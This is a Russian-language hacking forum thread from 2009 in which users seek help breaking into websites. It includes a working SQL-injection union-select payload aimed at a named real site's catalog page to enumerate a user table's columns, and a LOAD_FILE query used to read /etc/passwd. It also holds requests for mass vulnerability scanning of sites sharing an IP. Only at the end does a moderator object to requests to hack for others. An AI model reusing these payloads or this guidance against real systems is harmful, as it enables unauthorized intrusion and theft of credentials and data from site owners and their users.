 |
|
26.08.2009, 22:43
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Да если есьт шелл на http серваке, ставь проксю его, FreeCap на удалённый менеджер mYSQL
Думаю юзера и пасс знаешь.
Если знаешь то впустит.
|
|
|
26.08.2009, 22:46
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.
|
|
|
|
26.08.2009, 22:50
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от jecka3000
есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.
Вручную парниш 
Рандомом выбери и посмотри.
Или же смотри на античате в скулях или инклюдах.
|
|
|
|
26.08.2009, 23:06
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?
|
|
|
|
26.08.2009, 23:33
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от jecka3000
Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?
Как пафосно то реклама не более. Всё зависит от хостера... Что значит "в современных хостах"? Он тебе описал скорее не "современные хосты", а то как должно быть у нормального хостера... а дебилы, как были, так и будут, хоть у "современных", хоть у "старомодных" хостеров...
|
|
|
|
26.08.2009, 23:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Правда конечно. Что ты
|
|
|
|
26.08.2009, 23:53
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'
|
|
|
|
27.08.2009, 00:03
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от jecka3000
очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'
http://www.poraduy.ru/catalog/?id=-99+union+select+group_concat(column_name+separator +0x0a)+from+information_schema.columns+where+table _name=0x70687062625f61636c5f7573657273
|
|
|
|
27.08.2009, 00:13
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сделал запрос в ту маштнку такого вида
SELECT 1,2,3,LOAD_FILE('../../../etc/passwd'),5,6,7 FROm access
Мне выдался passwd как с помошью него можно на сервер залезть?
Пытался через Pytty подключится но сказал типо сервер недоступен...даже не спросил логин |
|
|
|
27.08.2009, 00:13
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от jecka3000
[x60]unu,DrAssault большое спасибо, но не могли бы Вы раскрутить до имени и пароля админа, ибо в данном случае я не понял, как были подобраны поля и столбцы...
Может сразу шелл?
Одно дело помочь ответив на вопрос, другое просить взломать за тебя.
Тема не для просьб о взломе - для этого есть специальный раздел.
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
